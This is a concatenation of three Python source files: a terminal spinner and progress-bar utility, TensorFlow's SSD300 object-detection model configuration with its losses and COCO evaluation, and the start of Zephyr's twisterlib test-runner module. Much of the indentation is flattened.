spins2 = '/-\\|'
spins3 = '-\\|/'
spins4 = '\\|/-'
sys.stdout.write(msg)
for i in itertools.cycle(range(4)):
out = "{}\t{}{}{}{}".format(msg2, spins[i], spins2[i], spins3[i], spins4[i])
sys.stdout.write(out)
sys.stdout.flush()
sys.stdout.write('\x08'*len(out))
time.sleep(.1)
if not signal.go:
break
sys.stdout.write('\x08'*(4+len(msg)))
def _progress(self, msg, msg2, signal):
sys.stdout.write(msg)
while signal.go:
try:
now_size = self._get_size(self.filename)
except OSError:
# File may not exist yet; keep polling until it appears or end() is called.
time.sleep(.1)
continue
self._showProgress(msg2, now_size)
if self.full_size == now_size:
break
def _showProgress(self, msg2, now_size):
# Show progress bar.
out = msg2 + self._get_bar(now_size)
sys.stdout.write(out)
time.sleep(.2)
sys.stdout.flush()
sys.stdout.write('\x08'*len(out))
time.sleep(.1)
def _get_bar(self, now_size):
_space = ' '
_bar = '='
_arrow = '>'
bar_size = 60
ratio = now_size / self.full_size
arrow = _bar * (int((ratio) * bar_size) - 1) + _arrow
space = _space * (bar_size - len(arrow))
percent = '{0:5.2f}%'.format(ratio * 100)
out = '['+ arrow + space + ']' + percent
return out
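# Worked example (illustrative): if now_size / self.full_size == 0.5 and bar_size == 60,
# the arrow is 29 '=' characters followed by '>', padded with 30 spaces, giving
# '[' + '='*29 + '>' + ' '*30 + ']' + '50.00%'.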
def _get_size(self, filename):
'''
_get_size(): get the file size from a filename and return it.
'''
return os.path.getsize(os.path.abspath(filename))
def end(self):
'''
end() stop animation.
'''
self.signal.go = False
self.anim.join()
class MultiCmdAnimation(CmdAnimation):
'''
This class is an extension of CmdAnimation and provides a command-line animation across multiple lines.
.. code-block:: python
:emphasize-lines: 3,5
from easyutil import MultiCmdAnimation
anm = MultiCmdAnimation("progress", filenames=files, msgs2=msgs2, sizes=sizes)
anm.start()
# Your function here.
anm.end()
'''
def __init__(self, anim_type='progress', filenames=[], sizes=[], msgs=[], msgs2=[]):
"""
Currently only the progress mode is supported.
:anim_type[str]: [progress]
:filenames[str list]: for showing progress bars.
:sizes[int list]: full file sizes, for showing progress bars.
"""
CmdAnimation.__init__(self)
self.types = {"progress": self._progress}
self.func = self.types[anim_type]
self.filenames = filenames
self.msg = ['' for i in range(len(msgs2))]
self.msg2 = msgs2
self.signal = Signal()
self.full_sizes = sizes
def start(self):
'''
start() starts animation.
'''
self.anim = threading.Thread(target=self.func, args=(self.msg, self.msg2, self.signal))
self.anim.start()
def _progress(self, msg, msg2, signal):
_msg = ' '
        get_names = [ easyThread(func=self._get_size, args=(_msg, filename))
                      for filename in self.filenames ]
        [ t.start() for t in get_names ]
        while True:
            if not signal.go:
                break
            now_sizes = [ t.get_value() for t in get_names ]
            self._showProgress(msg2, now_sizes)
            [ get_names[i].join() for i, now_size in enumerate(now_sizes)
              if now_size == self.full_sizes[i] ]
def _showProgress(self, msg2, now_sizes):
# Show progress bar.
out = ''
for i, now_size in enumerate(now_sizes):
header = es.constant_width(msg2[i], 50)
out += header + self._get_bar(now_size, self.full_sizes[i])
sys.stdout.write(out)
time.sleep(.3)
sys.stdout.flush()
sys.stdout.write('\x08'*(len(out)))
time.sleep(.1)
def _get_bar(self, now_size, full_size):
_space = ' '
_bar = '='
_arrow = '>'
bar_size = 60
ratio = now_size / full_size
arrow = _bar * (int((ratio) * bar_size) - 1) + _arrow
space = _space * (bar_size - len(arrow))
percent = '{0:5.2f}% |'.format(ratio * 100)
out = '['+ arrow + space + ']' + percent
return out
if __name__ == "__main__":
"""
msgs = ["msg:hello"+str(i) for i in range(4)]
msgs2 = [u"msg2:helloあ" for i in range(4)]
files = ["hello"+str(i)+'.txt' for i in range(4)]
sizes = [10*4 for i in range(4)]
anm = MultiCmdAnimation("progress", filenames=files, msgs2=msgs2, sizes=sizes)
anm.start()
anm.end()
"""
|
ssd_model.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD300 Model Configuration.
References:
Wei Liu, Dragomir Anguelov, Dumitru Erhan, Christian Szegedy, Scott Reed,
Cheng-Yang Fu, Alexander C. Berg
SSD: Single Shot MultiBox Detector
arXiv:1512.02325
Ported from MLPerf reference implementation:
https://github.com/mlperf/reference/tree/ssd/single_stage_detector/ssd
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import re
import threading
import tensorflow as tf
import constants
import mlperf
import ssd_constants
from cnn_util import log_fn
from models import model as model_lib
from models import resnet_model
BACKBONE_MODEL_SCOPE_NAME = 'resnet34_backbone'
class SSD300Model(model_lib.CNNModel):
"""Single Shot Multibox Detection (SSD) model for 300x300 image datasets."""
def __init__(self, label_num=ssd_constants.NUM_CLASSES, batch_size=32,
learning_rate=1e-3, backbone='resnet34', params=None):
super(SSD300Model, self).__init__('ssd300', 300, batch_size, learning_rate,
params=params)
# For COCO dataset, 80 categories + 1 background = 81 labels
self.label_num = label_num
# Currently only support ResNet-34 as backbone model
if backbone != 'resnet34':
raise ValueError('Invalid backbone model %s for SSD.' % backbone)
mlperf.logger.log(key=mlperf.tags.BACKBONE, value=backbone)
# Number of channels and default boxes associated with the following layers:
# ResNet34 layer, Conv7, Conv8_2, Conv9_2, Conv10_2, Conv11_2
self.out_chan = [256, 512, 512, 256, 256, 256]
mlperf.logger.log(key=mlperf.tags.LOC_CONF_OUT_CHANNELS,
value=self.out_chan)
# Number of default boxes from layers of different scales
# 38x38x4, 19x19x6, 10x10x6, 5x5x6, 3x3x4, 1x1x4
self.num_dboxes = [4, 6, 6, 6, 4, 4]
mlperf.logger.log(key=mlperf.tags.NUM_DEFAULTS_PER_CELL,
value=self.num_dboxes)
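    # For reference, the total number of default boxes over these feature maps is
    # 38*38*4 + 19*19*6 + 10*10*6 + 5*5*6 + 3*3*4 + 1*1*4 = 8732, the standard
    # SSD300 box count (ssd_constants.NUM_SSD_BOXES is expected to equal this).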
# TODO(haoyuzhang): in order to correctly restore in replicated mode, need
# to create a saver for each tower before graph is finalized. Use variable
# manager for better efficiency.
self.backbone_savers = []
# Collected predictions for eval stage. It maps each image id in eval
# dataset to a dict containing the following information:
# source_id: raw ID of image
# raw_shape: raw shape of image
# pred_box: encoded box coordinates of prediction
# pred_scores: scores of classes in prediction
self.predictions = {}
# Global step when predictions are collected.
self.eval_global_step = 0
# Average precision. In asynchronous eval mode, this is the latest AP we
# get so far and may not be the results at current eval step.
self.eval_coco_ap = 0
    # Process, queues, and thread for asynchronous evaluation. When enabled,
    # create a separate process (async_eval_process) that continuously pulls
    # intermediate results from the predictions queue (a multiprocessing queue),
    # processes them, and pushes final results into the results queue (another
    # multiprocessing queue). The main thread is responsible for pushing messages
    # into the predictions queue, and starts a separate thread to continuously pull
    # messages from the results queue to update final results.
# Message in predictions queue should be a tuple of two elements:
# (evaluation step, predictions)
# Message in results queue should be a tuple of two elements:
# (evaluation step, final results)
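    # Illustrative example (values assumed for illustration): the main thread
    # puts (1000, decoded_predictions) into the predictions queue, and the
    # getter thread later reads back something like (1000, {'COCO/AP': 0.23})
    # from the results queue.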
self.async_eval_process = None
self.async_eval_predictions_queue = None
self.async_eval_results_queue = None
self.async_eval_results_getter_thread = None
# The MLPerf reference uses a starting lr of 1e-3 at bs=32.
self.base_lr_batch_size = 32
def skip_final_affine_layer(self):
return True
def add_backbone_model(self, cnn):
# --------------------------------------------------------------------------
# Resnet-34 backbone model -- modified for SSD
# --------------------------------------------------------------------------
# Input 300x300, output 150x150
cnn.conv(64, 7, 7, 2, 2, mode='SAME_RESNET', use_batch_norm=True)
cnn.mpool(3, 3, 2, 2, mode='SAME')
resnet34_layers = [3, 4, 6, 3]
version = 'v1'
# ResNet-34 block group 1
# Input 150x150, output 75x75
for i in range(resnet34_layers[0]):
# Last argument forces residual_block to use projection shortcut, even
# though the numbers of input and output channels are equal
resnet_model.residual_block(cnn, 64, 1, version)
# ResNet-34 block group 2
# Input 75x75, output 38x38
for i in range(resnet34_layers[1]):
stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 128, stride, version, i == 0)
# ResNet-34 block group 3
# This block group is modified: first layer uses stride=1 so that the image
# size does not change in group of layers
# Input 38x38, output 38x38
for i in range(resnet34_layers[2]):
# The following line is intentionally commented out to differentiate from
# the original ResNet-34 model
# stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 256, stride, version, i == 0)
# ResNet-34 block group 4: removed final block group
    # The following 3 lines are intentionally commented out to differentiate from
    # the original ResNet-34 model
# for i in range(resnet34_layers[3]):
# stride = 2 if i == 0 else 1
# resnet_model.residual_block(cnn, 512, stride, version, i == 0)
def add_inference(self, cnn):
cnn.use_batch_norm = True
cnn.batch_norm_config = {'decay': ssd_constants.BATCH_NORM_DECAY,
'epsilon': ssd_constants.BATCH_NORM_EPSILON,
'scale': True}
with tf.variable_scope(BACKBONE_MODEL_SCOPE_NAME):
self.add_backbone_model(cnn)
# --------------------------------------------------------------------------
# SSD additional layers
# --------------------------------------------------------------------------
def add_ssd_layer(cnn, depth, k_size, stride, mode):
return cnn.conv(depth, k_size, k_size, stride, stride,
mode=mode, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
# Activations for feature maps of different layers
self.activations = [cnn.top_layer]
# Conv7_1, Conv7_2
# Input 38x38, output 19x19
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv8_1, Conv8_2
# Input 19x19, output 10x10
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv9_1, Conv9_2
# Input 10x10, output 5x5
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 2, 'same'))
# Conv10_1, Conv10_2
# Input 5x5, output 3x3
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
# Conv11_1, Conv11_2
# Input 3x3, output 1x1
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
self.loc = []
self.conf = []
for nd, ac, oc in zip(self.num_dboxes, self.activations, self.out_chan):
l = cnn.conv(nd * 4, 3, 3, 1, 1, input_layer=ac,
num_channels_in=oc, activation=None, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
scale = l.get_shape()[-1]
# shape = [batch_size, nd * 4, scale, scale]
l = tf.reshape(l, [self.batch_size, nd, 4, scale, scale])
# shape = [batch_size, nd, 4, scale, scale]
l = tf.transpose(l, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, 4]
self.loc.append(tf.reshape(l, [self.batch_size, -1, 4]))
# shape = [batch_size, nd * scale * scale, 4]
c = cnn.conv(nd * self.label_num, 3, 3, 1, 1, input_layer=ac,
num_channels_in=oc, activation=None, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
# shape = [batch_size, nd * label_num, scale, scale]
c = tf.reshape(c, [self.batch_size, nd, self.label_num, scale, scale])
# shape = [batch_size, nd, label_num, scale, scale]
c = tf.transpose(c, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, label_num]
self.conf.append(tf.reshape(c, [self.batch_size, -1, self.label_num]))
# shape = [batch_size, nd * scale * scale, label_num]
# Shape of locs: [batch_size, NUM_SSD_BOXES, 4]
# Shape of confs: [batch_size, NUM_SSD_BOXES, label_num]
locs, confs = tf.concat(self.loc, 1), tf.concat(self.conf, 1)
# Pack location and confidence outputs into a single output layer
# Shape of logits: [batch_size, NUM_SSD_BOXES, 4+label_num]
logits = tf.concat([locs, confs], 2)
cnn.top_layer = logits
cnn.top_size = 4 + self.label_num
return cnn.top_layer
def get_learning_rate(self, global_step, batch_size):
rescaled_lr = self.get_scaled_base_learning_rate(batch_size)
# Defined in MLPerf reference model
boundaries = [160000, 200000]
boundaries = [b * self.base_lr_batch_size // batch_size for b in boundaries]
decays = [1, 0.1, 0.01]
learning_rates = [rescaled_lr * d for d in decays]
lr = tf.train.piecewise_constant(global_step, boundaries, learning_rates)
warmup_steps = int(118287 / batch_size * 5)
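    # Worked example (illustrative, using the defaults above): at batch_size=256
    # the scaled boundaries become [160000*32//256, 200000*32//256] = [20000, 25000]
    # and warmup_steps = int(118287 / 256 * 5) = 2310.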
warmup_lr = (
rescaled_lr * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)
def get_scaled_base_learning_rate(self, batch_size):
"""Calculates base learning rate for creating lr schedule.
In replicated mode, gradients are summed rather than averaged which, with
the sgd and momentum optimizers, increases the effective learning rate by
lr * num_gpus. Dividing the base lr by num_gpus negates the increase.
Args:
batch_size: Total batch-size.
Returns:
Base learning rate to use to create lr schedule.
"""
base_lr = self.learning_rate
if self.params.variable_update == 'replicated':
base_lr = self.learning_rate / self.params.num_gpus
scaled_lr = base_lr * (batch_size / self.base_lr_batch_size)
return scaled_lr
def _collect_backbone_vars(self):
backbone_vars = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope='.*'+ BACKBONE_MODEL_SCOPE_NAME)
var_list = {}
# Assume variables in the checkpoint are following the naming convention of
# a model checkpoint trained with TF official model
# TODO(haoyuzhang): the following variable name parsing is hacky and easy
# to break if there is change in naming convention of either benchmarks or
# official models.
for v in backbone_vars:
# conv2d variable example (model <-- checkpoint):
# v/cg/conv24/conv2d/kernel:0 <-- conv2d_24/kernel
if 'conv2d' in v.name:
re_match = re.search(r'conv(\d+)/conv2d/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'conv2d', layer_id, param_name)
var_list[vname_in_ckpt] = v
# batchnorm varariable example:
# v/cg/conv24/batchnorm25/gamma:0 <-- batch_normalization_25/gamma
elif 'batchnorm' in v.name:
re_match = re.search(r'batchnorm(\d+)/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'batch_normalization', layer_id, param_name)
var_list[vname_in_ckpt] = v
return var_list
def _var_name_in_official_model_ckpt(self, layer_name, layer_id, param_name):
"""Return variable names according to convention in TF official models."""
vname_in_ckpt = layer_name
if layer_id > 0:
vname_in_ckpt += '_' + str(layer_id)
vname_in_ckpt += '/' + param_name
return vname_in_ckpt
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
# Unpack model output back to locations and confidence scores of predictions
# Shape of pred_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of pred_label: [batch_size, NUM_SSD_BOXES, label_num]
pred_loc, pred_label = tf.split(logits, [4, self.label_num], 2)
# Shape of gt_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of gt_label: [batch_size, NUM_SSD_BOXES, 1]
# Shape of num_gt: [batch_size]
_, gt_loc, gt_label, num_gt = inputs
gt_label = tf.cast(gt_label, tf.int32)
box_loss = self._localization_loss(pred_loc, gt_loc, gt_label, num_gt)
class_loss = self._classification_loss(pred_label, gt_label, num_gt)
tf.summary.scalar('box_loss', tf.reduce_mean(box_loss))
tf.summary.scalar('class_loss', tf.reduce_mean(class_loss))
return class_loss + box_loss
def _localization_loss(self, pred_loc, gt_loc, gt_label, num_matched_boxes):
"""Computes the localization loss.
Computes the localization loss using smooth l1 loss.
Args:
pred_loc: a flatten tensor that includes all predicted locations. The
shape is [batch_size, num_anchors, 4].
gt_loc: a tensor representing box regression targets in
[batch_size, num_anchors, 4].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
        targets, used as the loss normalizer. The shape is [batch_size].
Returns:
box_loss: a float32 representing total box regression loss.
"""
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
smooth_l1 = tf.reduce_sum(tf.losses.huber_loss(
gt_loc, pred_loc,
reduction=tf.losses.Reduction.NONE
), axis=2)
smooth_l1 = tf.multiply(smooth_l1, float_mask)
box_loss = tf.reduce_sum(smooth_l1, axis=1)
return tf.reduce_mean(box_loss / num_matched_boxes)
def _classification_loss(self, pred_label, gt_label, num_matched_boxes):
"""Computes the classification loss.
Computes the classification loss with hard negative mining.
Args:
pred_label: a flatten tensor that includes all predicted class. The shape
is [batch_size, num_anchors, num_classes].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
        targets. This is used as the loss normalizer.
Returns:
box_loss: a float32 representing total box regression loss.
"""
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
gt_label, pred_label, reduction=tf.losses.Reduction.NONE)
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
# Hard example mining
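    # The argsort-of-argsort below computes, for each box, the rank of its
    # negative-masked loss when sorted in descending order. Illustrative example:
    # losses [0.2, 0.9, 0.5] -> descending argsort [1, 2, 0] -> ranks [2, 0, 1],
    # so the box with the highest loss gets rank 0 and is selected first.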
neg_masked_cross_entropy = cross_entropy * (1 - float_mask)
relative_position = tf.contrib.framework.argsort(
tf.contrib.framework.argsort(
neg_masked_cross_entropy, direction='DESCENDING'))
num_neg_boxes = tf.minimum(
tf.to_int32(num_matched_boxes) * ssd_constants.NEGS_PER_POSITIVE,
ssd_constants.NUM_SSD_BOXES)
top_k_neg_mask = tf.cast(tf.less(
relative_position,
tf.tile(num_neg_boxes[:, tf.newaxis], (1, ssd_constants.NUM_SSD_BOXES))
), tf.float32)
class_loss = tf.reduce_sum(
tf.multiply(cross_entropy, float_mask + top_k_neg_mask), axis=1)
return tf.reduce_mean(class_loss / num_matched_boxes)
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
for saver in self.backbone_savers:
saver.restore(sess, backbone_model_path)
def get_input_data_types(self, subset):
if subset == 'validation':
return [self.data_type, tf.float32, tf.float32, tf.float32, tf.int32]
return [self.data_type, tf.float32, tf.float32, tf.float32]
def get_input_shapes(self, subset):
"""Return encoded tensor shapes for train and eval data respectively."""
if subset == 'validation':
# Validation data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. source image IDs
# 5. raw image shapes
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 4],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 1],
[self.batch_size],
[self.batch_size, 3],
]
# Training data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. numbers of objects in images
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1],
[self.batch_size]
]
def accuracy_function(self, inputs, build_network_result):
"""Returns the ops to measure the mean precision of the model."""
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
from object_detection.box_coders import faster_rcnn_box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_list # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
                        '#protobuf-compilation ; To evaluate using COCO '
                        'metric, download and install Python COCO API from '
'https://github.com/cocodataset/cocoapi')
# Unpack model output back to locations and confidence scores of predictions
    # pred_locs: relative locations (coordinates) of objects in all SSD boxes
# shape: [batch_size, NUM_SSD_BOXES, 4]
# pred_labels: confidence scores of objects being of all categories
# shape: [batch_size, NUM_SSD_BOXES, label_num]
pred_locs, pred_labels = tf.split(build_network_result.logits,
[4, self.label_num], 2)
ssd_box_coder = faster_rcnn_box_coder.FasterRcnnBoxCoder(
scale_factors=ssd_constants.BOX_CODER_SCALES)
anchors = box_list.BoxList(
tf.convert_to_tensor(ssd_dataloader.DefaultBoxes()('ltrb')))
pred_boxes = box_coder.batch_decode(
encoded_boxes=pred_locs, box_coder=ssd_box_coder, anchors=anchors)
pred_scores = tf.nn.softmax(pred_labels, axis=2)
# TODO(haoyuzhang): maybe use `gt_boxes` and `gt_classes` for visualization.
_, gt_boxes, gt_classes, source_id, raw_shape = inputs # pylint: disable=unused-variable
return {
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_BOXES): pred_boxes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_SCORES): pred_scores,
# TODO(haoyuzhang): maybe use these values for visualization.
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_boxes': gt_boxes,
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_classes': gt_classes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.SOURCE_ID): source_id,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.RAW_SHAPE): raw_shape
}
def postprocess(self, results):
"""Postprocess results returned from model."""
try:
import coco_metric # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
                        '#protobuf-compilation ; To evaluate using COCO '
                        'metric, download and install Python COCO API from '
'https://github.com/cocodataset/cocoapi')
pred_boxes = results[ssd_constants.PRED_BOXES]
pred_scores = results[ssd_constants.PRED_SCORES]
# TODO(haoyuzhang): maybe use these values for visualization.
# gt_boxes = results['gt_boxes']
# gt_classes = results['gt_classes']
source_id = results[ssd_constants.SOURCE_ID]
raw_shape = results[ssd_constants.RAW_SHAPE]
# COCO evaluation requires processing COCO_NUM_VAL_IMAGES exactly once. Due
# to rounding errors (i.e., COCO_NUM_VAL_IMAGES % batch_size != 0), setting
# `num_eval_epochs` to 1 is not enough and will often miss some images. We
    # expect the user to set `num_eval_epochs` to >1, which will leave some unused
# images from previous steps in `predictions`. Here we check if we are doing
# eval at a new global step.
if results['global_step'] > self.eval_global_step:
self.eval_global_step = results['global_step']
self.predictions.clear()
for i, sid in enumerate(source_id):
self.predictions[int(sid)] = {
ssd_constants.PRED_BOXES: pred_boxes[i],
ssd_constants.PRED_SCORES: pred_scores[i],
ssd_constants.SOURCE_ID: source_id[i],
ssd_constants.RAW_SHAPE: raw_shape[i]
}
    # COCO metric calculates mAP only after a full epoch of evaluation. Return
    # dummy results for top_N_accuracy to be compatible with benchmark_cnn.py.
if len(self.predictions) >= ssd_constants.COCO_NUM_VAL_IMAGES:
log_fn('Got results for all {:d} eval examples. Calculate mAP...'.format(
ssd_constants.COCO_NUM_VAL_IMAGES))
annotation_file = os.path.join(self.params.data_dir,
ssd_constants.ANNOTATION_FILE)
      # Size of predictions before decoding is about 15--30GB, while the size after
# decoding is 100--200MB. When using async eval mode, decoding takes
# 20--30 seconds of main thread time but is necessary to avoid OOM during
# inter-process communication.
decoded_preds = coco_metric.decode_predictions(self.predictions.values())
self.predictions.clear()
if self.params.collect_eval_results_async:
def _eval_results_getter():
"""Iteratively get eval results from async eval process."""
while True:
step, eval_results = self.async_eval_results_queue.get()
self.eval_coco_ap = eval_results['COCO/AP']
mlperf.logger.log_eval_accuracy(
self.eval_coco_ap, step, self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
if self.reached_target():
# Reached target, clear all pending messages in predictions queue
# and insert poison pill to stop the async eval process.
while not self.async_eval_predictions_queue.empty():
self.async_eval_predictions_queue.get()
self.async_eval_predictions_queue.put('STOP')
break
if not self.async_eval_process:
# Limiting the number of messages in predictions queue to prevent OOM.
# Each message (predictions data) can potentially consume a lot of
# memory, and normally there should only be few messages in the queue.
# If often blocked on this, consider reducing eval frequency.
self.async_eval_predictions_queue = multiprocessing.Queue(2)
self.async_eval_results_queue = multiprocessing.Queue()
          # The reason to use a Process as opposed to a Thread is mainly the
          # computationally intensive eval runner. Python multithreading does not
          # truly run in parallel; a runner thread would get significantly
          # delayed (or alternatively delay the main thread).
self.async_eval_process = multiprocessing.Process(
target=coco_metric.async_eval_runner,
args=(self.async_eval_predictions_queue,
self.async_eval_results_queue,
annotation_file))
self.async_eval_process.daemon = True
self.async_eval_process.start()
self.async_eval_results_getter_thread = threading.Thread(
target=_eval_results_getter, args=())
self.async_eval_results_getter_thread.daemon = True
self.async_eval_results_getter_thread.start()
self.async_eval_predictions_queue.put(
(self.eval_global_step, decoded_preds))
return {'top_1_accuracy': 0, 'top_5_accuracy': 0.}
eval_results = coco_metric.compute_map(decoded_preds, annotation_file)
self.eval_coco_ap = eval_results['COCO/AP']
ret = {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
for metric_key, metric_value in eval_results.items():
ret[constants.SIMPLE_VALUE_RESULT_PREFIX + metric_key] = metric_value
mlperf.logger.log_eval_accuracy(self.eval_coco_ap, self.eval_global_step,
self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
return ret
log_fn('Got {:d} out of {:d} eval examples.'
' Waiting for the remaining to calculate mAP...'.format(
len(self.predictions), ssd_constants.COCO_NUM_VAL_IMAGES))
return {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
def get_synthetic_inputs(self, input_name, nclass):
"""Generating synthetic data matching real data shape and type."""
inputs = tf.random_uniform(
self.get_input_shapes('train')[0], dtype=self.data_type)
inputs = tf.contrib.framework.local_variable(inputs, name=input_name)
boxes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4], dtype=tf.float32)
classes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1], dtype=tf.float32)
nboxes = tf.random_uniform(
[self.batch_size], minval=1, maxval=10, dtype=tf.float32)
return (inputs, boxes, classes, nboxes)
def reached_target(self):
return (self.params.stop_at_top_1_accuracy and
self.eval_coco_ap >= self.params.stop_at_top_1_accuracy)
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
import colorama
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
